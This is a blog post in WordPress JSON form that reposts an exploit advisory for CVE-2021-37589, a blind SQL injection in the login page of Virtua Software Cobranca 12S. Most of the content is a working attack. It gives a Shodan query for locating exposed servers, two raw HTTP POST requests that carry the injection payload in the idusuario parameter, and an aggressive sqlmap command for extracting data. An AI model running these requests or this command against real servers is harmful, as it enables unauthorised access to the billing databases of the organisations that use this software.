{"id":25911,"date":"2022-06-19T22:20:02","date_gmt":"2022-06-19T18:20:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167480\/virtuasc12s-sql.txt"},"modified":"2022-07-13T11:12:38","modified_gmt":"2022-07-13T06:42:38","slug":"virtua-software-cobranca-12s-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/virtua-software-cobranca-12s-sql-injection\/","title":{"rendered":"Virtua Software Cobranca 12S SQL Injection"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Virtua Software Cobranca 12S &#8211; SQLi<br \/>\n# Shodan Query: http.favicon.hash:876876147<br \/>\n# Date: 13\/08\/2021<br \/>\n# Exploit Author: Luca Regne<br \/>\n# Vendor Homepage: https:\/\/www.virtuasoftware.com.br\/<br \/>\n# Software Link: https:\/\/www.virtuasoftware.com.br\/downloads\/Cobranca12S_13_08.exe<br \/>\n# Version: 12S<br \/>\n# Tested on: Windows Server 2019<br \/>\n# CVE : CVE-2021-37589<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<p dir=\"ltr\">## Description<br \/>\nA Blind SQL injection vulnerability in a Login Page (\/controller\/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter.<\/p>\n<p dir=\"ltr\">## Request PoC<br \/>\n&#8220;`<br \/>\nPOST \/controller\/login.php?acao=autenticar HTTP\/1.1<br \/>\nHost: redacted.com<br \/>\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:90.0) Gecko\/20100101 Firefox\/90.0<br \/>\nAccept: application\/json, text\/javascript, *\/*; q=0.01<br \/>\nAccept-Language: en-US,en;q=0.5<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8<br \/>\nX-Requested-With: XMLHttpRequest<br \/>\nContent-Length: 37<br \/>\nConnection: close<br \/>\nCookie: origem_selecionado=; PHPSESSID=<\/p>\n<p dir=\"ltr\">idusuario=&#8217;&amp;idsenha=awesome_and_unprobaly_password&amp;tipousr=Usuario<\/p>\n<p dir=\"ltr\">&#8220;`<\/p>\n<p dir=\"ltr\">This request causes an error 500. Changing the idusuario to &#8220;&#8216;+AND+&#8217;1&#8217;%3d&#8217;1&#8217;&#8211;&#8221; the response to request was 200 status code with message of authentication error.<\/p>\n<p dir=\"ltr\">&#8220;`<br \/>\nPOST \/controller\/login.php?acao=autenticar HTTP\/1.1<br \/>\nHost: redacted.com<br \/>\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:90.0) Gecko\/20100101 Firefox\/90.0<br \/>\nAccept: application\/json, text\/javascript, *\/*; q=0.01<br \/>\nAccept-Language: en-US,en;q=0.5<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8<br \/>\nX-Requested-With: XMLHttpRequest<br \/>\nContent-Length: 37<br \/>\nConnection: close<br \/>\nCookie: origem_selecionado=; PHPSESSID=<\/p>\n<p dir=\"ltr\">idusuario=&#8217;+AND+&#8217;1&#8217;=&#8217;1&#8242;&#8211;&amp;idsenha=a&amp;tipousr=Usuario<\/p>\n<p dir=\"ltr\">&#8220;`<\/p>\n<p dir=\"ltr\">## Exploit<br \/>\nSave the request from burp to file<br \/>\n&#8220;`bash<br \/>\npython3 sqlmap.py -r ~\/req-virtua.txt -p idusuario &#8211;dbms firebird &#8211;level 5 &#8211;risk 3 &#8211;random-agent<br \/>\n&#8220;`<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Virtua Software Cobranca 12S &#8211; SQLi # Shodan Query: http.favicon.hash:876876147 # Date: 13\/08\/2021 # Exploit Author: Luca Regne # Vendor Homepage: https:\/\/www.virtuasoftware.com.br\/ # Software Link: https:\/\/www.virtuasoftware.com.br\/downloads\/Cobranca12S_13_08.exe # Version: 12S # Tested on: Windows Server 2019 # CVE : CVE-2021-37589 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; ## Description A Blind SQL injection vulnerability in a Login Page (\/controller\/login.php) &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-25911","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25911","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=25911"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25911\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=25911"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=25911"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=25911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}